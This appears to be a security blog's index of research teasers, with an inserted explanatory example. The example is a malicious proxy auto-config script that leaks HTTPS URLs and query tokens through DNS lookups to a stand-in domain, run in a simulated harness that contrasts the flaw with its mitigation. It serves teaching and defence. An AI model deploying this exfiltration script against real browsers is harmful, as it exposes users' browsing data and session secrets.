Subverting the Agent on Network PATROL
A Red Team engagement led to the team discovering unprotected credentials encrypted with an infrastructure management product from software provider BMC. Opportunities multiply as they are seized. I like...

RDP Replay Code Release
In one of our previous blog posts, we wrote about how during routine monitoring on a client network, Context analysts noticed some unexpected RDP traffic and on further investigation it was found to be...

The rise and rise of red teaming
Red team testing is increasingly being employed by organisations across the business spectrum, but particularly in the banking and finance sector, to identify vulnerabilities that could leave them open...

Bluetooth LE - Increasingly popular, but still not very private
In May last year we wrote a blog post on our initial research on Bluetooth Low Energy (BLE). This covered our research into the new protocol, including what devices were using it, how it works, and...

The Security of HTTP-Headers
When it comes to web application security one often thinks about the obvious: sanitize user input, transmit data over encrypted channels and use secure functions. Often overlooked are the positive...

Binary SMS - The old backdoor to your new thing
Despite being older than many of its users, Short Messaging Service (SMS) remains a very popular communications medium and is increasingly found on remote sensors, critical infrastructure and vehicles...

Sniffing HTTPS URLS with malicious PAC files
In March this year we discovered an issue with the way many web browsers and operating systems handle Proxy Auto-Config (PAC) files. PAC files are JavaScript code that tell the browser which proxy to...

Obfuscation, Encryption & Unicorns… Reversing the string encryption in the...
Like many others I was happy to read the news that team Pangu released a jailbreak for iOS 9.3.3. A jailbroken device is especially useful in the field of security research, where we rely on root...

Attacks on HTTPS via malicious PAC files
In our last blog post, Sniffing HTTPS URLS with malicious PAC files, we described issues identified in the implementation of PAC files in various web browsers and operating systems. In this post we...
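The two PAC entries above both turn on the same mechanism: the browser hands FindProxyForURL(url, host) the URL of every request it is about to make, and a PAC file is attacker-supplied JavaScript that can call dnsResolve(). As an added example, not code from the original posts, the block below is a constructed malicious PAC script that hex-encodes the URL it receives into DNS labels and forces a lookup under an attacker-observed domain, together with a small Node.js harness that stands in for the browser's PAC runtime. The harness runs the script twice: once passing the full HTTPS URL (the vulnerable behaviour), and once passing only scheme and host (the mitigation browsers now apply to https URLs). The harness, the domain exfil.example, the sample URL and the function names are all assumptions made for this example.

```javascript
// Constructed example: a malicious proxy auto-config (PAC) script that leaks
// every URL it is asked about, run inside a simulated PAC runtime.
// runPac, decodeExfil, exfil.example and SAMPLE are assumptions for this demo,
// not names from the original posts.

// Attacker-controlled PAC file. The browser calls FindProxyForURL(url, host)
// for each request; if `url` still carries the HTTPS path and query, the
// script hex-encodes it into DNS labels and forces a lookup the attacker's
// authoritative name server will see, then returns "DIRECT" so the user
// notices nothing.
const MALICIOUS_PAC = `
function FindProxyForURL(url, host) {
  var hex = "";
  for (var i = 0; i < url.length; i++) {
    var c = url.charCodeAt(i).toString(16);
    hex += (c.length < 2 ? "0" : "") + c;
  }
  // DNS labels are capped at 63 bytes and a full name at 253, so a real
  // script would spread long URLs over several lookups; 60-char labels
  // are enough for the short sample URL used here.
  var labels = hex.match(/.{1,60}/g) || [];
  dnsResolve(labels.join(".") + ".exfil.example");
  return "DIRECT";
}`;

// Simulated PAC runtime (constructed): evaluates the script with a stub
// dnsResolve() that records every name it is asked for, then calls
// FindProxyForURL the way a browser would.
//   includePath = true  -> vulnerable behaviour, full URL passed to the script
//   includePath = false -> mitigation, only scheme and host for the request
function runPac(pacSource, requestUrl, { includePath = true } = {}) {
  const lookups = [];
  const dnsResolve = (name) => {
    lookups.push(name);
    return null; // pretend the name did not resolve
  };
  // The script's only reachable binding is the stub dnsResolve.
  const findProxy = new Function(
    "dnsResolve",
    `${pacSource}\nreturn FindProxyForURL;`
  )(dnsResolve);

  const u = new URL(requestUrl);
  const passedUrl = includePath ? requestUrl : `${u.protocol}//${u.host}/`;
  const proxy = findProxy(passedUrl, u.hostname);
  return { proxy, lookups };
}

// What the attacker recovers from one observed DNS query: strip the
// attacker suffix, drop the label separators and decode the hex.
function decodeExfil(name, suffix = ".exfil.example") {
  const hex = name.slice(0, -suffix.length).split(".").join("");
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Constructed sample request; the query string is what an attacker wants.
const SAMPLE = "https://bank.example/account?id=1234&token=abc";

// Runs both variants and returns what leaked in each case.
function demo() {
  const leaked = runPac(MALICIOUS_PAC, SAMPLE);
  const limited = runPac(MALICIOUS_PAC, SAMPLE, { includePath: false });
  return {
    fullUrlLeak: decodeExfil(leaked.lookups[0]),
    originOnlyLeak: decodeExfil(limited.lookups[0]),
  };
}

console.log(demo());
```

With the full URL passed in, decoding the single DNS query the script triggered yields the complete request URL including the query string; with the path stripped, the same script can only learn that the user visited https://bank.example/. Note that `new Function` is used only to keep the simulated runtime short; it gives the PAC source the same privileges as the harness and is not a substitute for the real sandbox a browser wraps PAC evaluation in.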

Manually Testing SSL/TLS Weaknesses 2016 Edition
In 2015 we published a blog post that explained how to manually test for the most common SSL/TLS weaknesses. This has become one of the most popular posts on our blog and so we have decided to write an...

Using SMB named pipes as a C2 channel
Intrusion detection systems are becoming increasingly capable of detecting malicious activity on the corporate perimeter, local network environment and on individual hosts. Commonly, when...

Analysing and repurposing Spartan's CVE-2015-7645
For this blog post we've chosen to analyse a Flash exploit utilised by the Spartan Exploit Kit, namely CVE-2015-7645. We'll go through the process of analysing the obfuscated Flash file, deshelling it...

Porting exploits to a Netgear WNR2200
Software vulnerabilities and the accompanying exploits are still all too common. Fortunately the response to vulnerabilities has got significantly better in recent years, with quick patching of the most...

Server Technologies - JBoss RMI Twiddling
Context encounters a wide range of server technologies during the course of penetration testing. Often there are known vulnerabilities that can be used to exploit them; other times Context create new...

SmartPhones - Can you Trust your USB Charger?
One of the biggest trends in the consumer electronics sector over the past few years has been the rise in the use of the now ubiquitous USB connection as the primary mechanism to charge a portable...

Server Technologies - SSL2: Should it keep you awake at night?
One of the issues Context encounters time and time again is web servers that support version 2 of the SSL protocol. The weaknesses in SSL2 are a significant issue that has been known about for fifteen...

SAP Exploitation – Part 1
In this series of posts I aim to cover in depth some of the publicly known infrastructure vulnerabilities that affect SAP (which stands for "Systems, Applications and Products in Data Processing")...

WebGL - A New Dimension for Browser Exploitation
Update: 11th May 2011 - Due to the high level of interest in Context's blog posting on the security issues within WebGL we are releasing the following FAQ. Summary: WebGL is a new web standard for...

UPDATE: WebGL FAQ
Due to the high level of interest in Context's blog posting on the security issues within WebGL we are releasing the following further information to aid in the understanding of the issues. "Am I...

WebGL – More WebGL Security Flaws
Summary: In this blog post Context demonstrates how to steal user data through web browsers using a vulnerability in Firefox's implementation of WebGL. This is a continuation of our research into serious...